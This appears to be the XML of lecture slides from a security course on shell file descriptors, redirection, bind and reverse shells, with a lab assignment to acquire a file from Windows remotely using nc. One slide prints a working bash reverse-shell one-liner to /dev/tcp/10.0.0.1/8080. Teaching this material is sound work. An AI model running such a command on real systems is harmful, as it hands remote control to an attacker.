            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (2);</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command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>output is just a shortcut for command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> output;</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You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using 2&gt;&amp;1 will redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to whatever value is set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0" err="1">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (and 1&gt;&amp;2 will do the opposite).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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965843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4BDF-0DE5-09BD-9D84-5B31B3A1A16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91C76E6-6D86-29EF-DD53-CB8A670CA499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Standard input/output/error devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Network utilities use standard devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Create a backdoor at Windows 10/Remote File Acquisition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>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504836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pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>Bind shell - attacker's machine acts as a client and the victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>firewall etc. may block the bind shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>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4943729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pPr marL="93131" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Shell - attacker's machine acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server. This is exactly what is done by the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.0.0.1/8080 0&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>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0582540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04ABA-149E-4CE9-98C4-9F02F632CB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Assignment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E557CAF6-7771-4DA8-97BD-9E8E765BDF8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a file in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yourFisrtLastNameEvidence.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the content of the file “hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yourname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don’t allow to touch Windows directly after you create the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you allow accessing Windows from Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>assume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely acquire the file from Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use command lines, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="745049" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>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910342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Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Standard_streams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.brianstorti.com/understanding-shell-script-idiom-redirect/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.computerhope.com/unix/nc.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2667" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2667" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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782016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Standard input/output/error devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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616338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F753199-C999-4C1F-8E71-71D4B05B93DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Input and output devices are files (0,1,2)!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="ctr"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006568" y="2428139"/>
            <a:ext cx="5689840" cy="3647732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612186" y="3584844"/>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Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313482" y="3014715"/>
            <a:ext cx="2017514" cy="72801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dirty="0"/>
              <a:t>Keyboard/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313482" y="4308470"/>
            <a:ext cx="1806872" cy="72801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dirty="0"/>
              <a:t>Display/file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4448980" y="3277852"/>
            <a:ext cx="1741706" cy="8155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3020384" y="3128571"/>
            <a:ext cx="1428596" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0&lt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855063" y="4308470"/>
            <a:ext cx="2458419" cy="364005"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Elbow Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5006568" y="4920263"/>
            <a:ext cx="1306914" cy="315974"/>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315822" y="3874919"/>
            <a:ext cx="1691489" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1&gt;     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2892657" y="5057935"/>
            <a:ext cx="2060179" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2&gt;    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>err output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7948123A-D870-4BDE-9461-61E542D4231B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617366" y="1885730"/>
            <a:ext cx="2831614" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FILE_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DESCRIPTOR 0,1,2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{668D3B19-1B49-4642-AA68-914F4B576A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3033173" y="2255062"/>
            <a:ext cx="225842" cy="759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8817267-0AE1-4201-B235-FE819981F7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3033173" y="2255062"/>
            <a:ext cx="176265" cy="1757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AD02304-3AA7-4BE6-ADE4-9A6A9AD6BDEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3020385" y="2255062"/>
            <a:ext cx="12788" cy="2724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Graphic 20" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B751FF-E3B2-4E2C-9A07-0B8C74975AD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20282" y="3029594"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Graphic 22" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193E8457-634C-4969-8489-9B765DF3E76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25865" y="3810178"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23" descr="Document outline">
            <a:extLst>
